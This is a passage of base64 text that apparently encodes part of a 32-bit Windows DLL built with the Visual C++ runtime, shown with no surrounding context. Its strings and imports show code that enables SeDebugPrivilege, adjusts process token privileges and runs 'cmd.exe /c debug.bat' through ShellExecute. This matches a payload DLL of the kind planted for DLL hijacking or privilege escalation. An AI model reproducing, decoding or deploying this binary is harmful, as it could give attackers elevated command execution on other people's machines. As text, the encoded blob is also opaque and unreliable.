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gAEEAdAB0AGUAbQBwAHQAIAB0AG8AIAB1AHMAZQAgAE0AUwBJAEwAIABjAG8AZABlACAAZgByAG8AbQAgAHQAaABpAHMAIABhAHMAcwBlAG0AYgBsAHkAIABkAHUAcgBpAG4AZwAgAG4AYQB0AGkAdgBlACAAYwBvAGQAZQAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgAKAFQAaABpAHMAIABpAG4AZABpAGMAYQB0AGUAcwAgAGEAIABiAHUAZwAgAGkAbgAgAHkAbwB1AHIAIABhAHAAcABsAGkAYwBhAHQAaQBvAG4ALgAgAEkAdAAgAGkAcwAgAG0AbwBzAHQAIABsAGkAawBlAGwAeQAgAHQAaABlACAAcgBlAHMAdQBsAHQAIABvAGYAIABjAGEAbABsAGkAbgBnACAAYQBuACAATQBTAEkATAAtAGMAbwBtAHAAaQBsAGUAZAAgACgALwBjAGwAcgApACAAZgB1AG4AYwB0AGkAbwBuACAAZgByAG8AbQAgAGEAIABuAGEAdABpAHYAZQAgAGMAbwBuAHMAdAByAHUAYwB0AG8AcgAgAG8AcgAgAGYAcgBvAG0AIABEAGwAbABNAGEAaQBuAC4ADQAKAAAAAABSADYAMAAzADIADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABsAG8AYwBhAGwAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgANAAoAAAAAAFIANgAwADMAMQANAAoALQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAdABoAGUAIABDAFIAVAAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGMAZQAuAAoAVABoAGkAcwAgAGkAbgBkAGkAYwBhAHQAZQBzACAAYQAgAGIAdQBnACAAaQBuACAAeQBvAHUAcgAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAuAA0ACgAAAAAAUgA2ADAAMwAwAA0ACgAtACAAQwBSAFQAIABuAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAANAAoAAAAAAFIANgAwADIAOAANAAoALQAgAHUAbgBhAGIAbABlACAAdABvACAAaQBuAGkAdABpAGEAbABpAHoAZQAgAGgAZQBhAHAADQAKAAAAAAAAAAAAUgA2ADAAMgA3AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAbABvAHcAaQBvACAAaQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAA0ACgAAAAAAAAAAAFIANgAwADIANgANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAHMAdABkAGkAbwAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgANAAoAAAAAAAAAAABSADYAMAAyADUADQAKAC0AIABwAHUAcgBlACAAdgBpAHIAdAB1AGEAbAAgAGYAdQBuAGMAdABpAG8AbgAgAGMAYQBsAGwADQAKAAAAAAAAAFIANgAwADIANAANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAF8AbwBuAGUAeABpAHQALwBhAHQAZQB4AGkAdAAgAHQAYQBiAGwAZQANAAoAAAAAAAAAAABSADYAMAAxADkADQAKAC0AIAB1AG4AYQBiAGwAZQAgAHQAbwAgAG8AcABlAG4AIABjAG8AbgBzAG8AbABlACAAZABlAHYAaQBjAGUADQAKAAAAAAAAAAAAUgA2ADAAMQA4AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGgAZQBhAHAAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA3AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAG0AdQBsAHQAaQB0AGgAcgBlAGEAZAAgAGwAbwBjAGsAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAdABoAHIAZQBhAGQAIABkAGEAdABhAA0ACgAAAFIANgAwADEAMAANAAoALQAgAGEAYgBvAHIAdAAoACkAIABoAGEAcwAgAGIAZQBlAG4AIABjAGEAbABsAGUAZAANAAoAAAAAAFIANgAwADAAOQANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAANAAoAAABSADYAMAAwADgADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABhAHIAZwB1AG0AZQBuAHQAcwANAAoAAAAAAAAAUgA2ADAAMAAyAA0ACgAtACAAZgBsAG8AYQB0AGkAbgBnACAAcABvAGkAbgB0ACAAcwB1AHAAcABvAHIAdAAgAG4AbwB0ACAAbABvAGEAZABlAGQADQAKAAAAAAAAAAAAAgAAACBuABAIAAAAyG0AEAkAAABwbQAQCgAAAChtABAQAAAA0GwAEBEAAABwbAAQEgAAAChsABATAAAA0GsAEBgAAABgawAQGQAAABBrABAaAAAAoGoAEBsAAAAwagAQHAAAAOBpABAeAAAAoGkAEB8AAADYaAAQIAAAAHBoABAhAAAAgGYAEHgAAABgZgAQeQAAAERmABB6AAAAKGYAEPwAAAAgZgAQ/wAAAABmABBNAGkAYwByAG8AcwBvAGYAdAAgAFYAaQBzAHUAYQBsACAAQwArACsAIABSAHUAbgB0AGkAbQBlACAATABpAGIAcgBhAHIAeQAAAAAACgAKAAAAAAAuAC4ALgAAADwAcAByAG8AZwByAGEAbQAgAG4AYQBtAGUAIAB1AG4AawBuAG8AdwBuAD4AAAAAAFIAdQBuAHQAaQBtAGUAIABFAHIAcgBvAHIAIQAKAAoAUAByAG8AZwByAGEAbQA6ACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgAGgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAYEBgQGBAYEBgQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAAQABAAEAAQABAAggGCAYIBggGCAYIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAEAAQABAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAFAAUABAAEAAQABAAEAAUABAAEAAQABAAEAAQAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEQAAEBAQEBAQEBAQEBAQEBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBEAACAQIBAgECAQIBAgECAQIBAQEAAAAAgIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6W1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/R2V0UHJvY2Vzc1dpbmRvd1N0YXRpb24AR2V0VXNlck9iamVjdEluZm9ybWF0aW9uVwAAAEdldExhc3RBY3RpdmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hXAFUAUwBFAFIAMwAyAC4ARABMAEwAAAAAACBDb21wbGV0ZSBPYmplY3QgTG9jYXRvcicAAAAgQ2xhc3MgSGllcmFyY2h5IERlc2NyaXB0b3InAAAAACBCYXNlIENsYXNzIEFycmF5JwAAIEJhc2UgQ2xhc3MgRGVzY3JpcHRvciBhdCAoACBUeXBlIERlc2NyaXB0b3InAAAAYGxvY2FsIHN0YXRpYyB0aHJlYWQgZ3VhcmQnAGBtYW5hZ2VkIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZHluYW1pYyBhdGV4aXQgZGVzdHJ1Y3RvciBmb3IgJwAAAABgZHluYW1pYyBpbml0aWFsaXplciBmb3IgJwAAYGVoIHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAABgb21uaSBjYWxsc2lnJwAAIGRlbGV0ZVtdAAAAIG5ld1tdAABgbG9jYWwgdmZ0YWJsZSBjb25zdHJ1Y3RvciBjbG9zdXJlJwBgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAYHVkdCByZXR1cm5pbmcnAGBjb3B5IGNvbnN0cnVjdG9yIGNsb3N1cmUnAABgZWggdmVjdG9yIHZiYXNlIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYGVoIHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAAB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AAAAAghYAEP7///8AAAAA2P///wAAAAD+////AAAAADUYABD+////AAAAAEEYABD+////AAAAAMD///8AAAAA/v///wAAAAC9HQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAGkrABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAADi4AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB3MQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAD40ABAAAAAA/v///wAAAADM////AAAAAP7///8AAAAAlzgAEAAAAAD+////AAAAANj///8AAAAA/v///5I6ABCWOgAQAAAAAP7///8AAAAAwP///wAAAAD+////AAAAAH88ABAAAAAA/v///wAAAADY////AAAAAP7///+7PwAQzj8AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAAZRQAQfIQAAAAAAAAAAAAAloUAABBgAABshAAAAAAAAAAAAADohQAAAGAAAGSFAAAAAAAAAAAAAAaGAAD4YAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQhQAAuIUAAKSFAAAAAAAAiIUAAICFAABshQAAEoYAACiGAAA4hgAASoYAAF6GAAB6hgAAmIYAAKyGAAC8hgAAyIYAANaGAADkhgAA7oYAAAaHAAAahwAAKocAADqHAABShwAAZIcAAHCHAAB+hwAAkIcAAKCHAADIhwAA1ocAAOiHAAAAiAAAFogAADCIAABGiAAAYIgAAG6IAAB8iAAAlogAAKaIAAC8iAAA1ogAAOKIAAD0iAAADIkAACSJAAAwiQAAOokAAEaJAABYiQAAZokAAHaJAACCiQAAmIkAAKSJAACwiQAAwIkAANaJAADoiQAAAAAAAPaFAAAAAAAAwAFHZXRDdXJyZW50UHJvY2VzcwCyBFNsZWVwAFIAQ2xvc2VIYW5kbGUAS0VSTkVMMzIuZGxsAAD3AU9wZW5Qcm9jZXNzVG9rZW4AAJYBTG9va3VwUHJpdmlsZWdlVmFsdWVBAB8AQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAEFEVkFQSTMyLmRsbAAAHgFTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAMUBR2V0Q3VycmVudFRocmVhZElkAADKAERlY29kZVBvaW50ZXIAhgFHZXRDb21tYW5kTGluZUEAwARUZXJtaW5hdGVQcm9jZXNzAADTBFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAApQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAANJc0RlYnVnZ2VyUHJlc2VudADqAEVuY29kZVBvaW50ZXIAxQRUbHNBbGxvYwAAxwRUbHNHZXRWYWx1ZQDIBFRsc1NldFZhbHVlAMYEVGxzRnJlZQDvAkludGVybG9ja2VkSW5jcmVtZW50AAAYAkdldE1vZHVsZUhhbmRsZVcAAHMEU2V0TGFzdEVycm9yAAACAkdldExhc3RFcnJvcgAA6wJJbnRlcmxvY2tlZERlY3JlbWVudAAARQJHZXR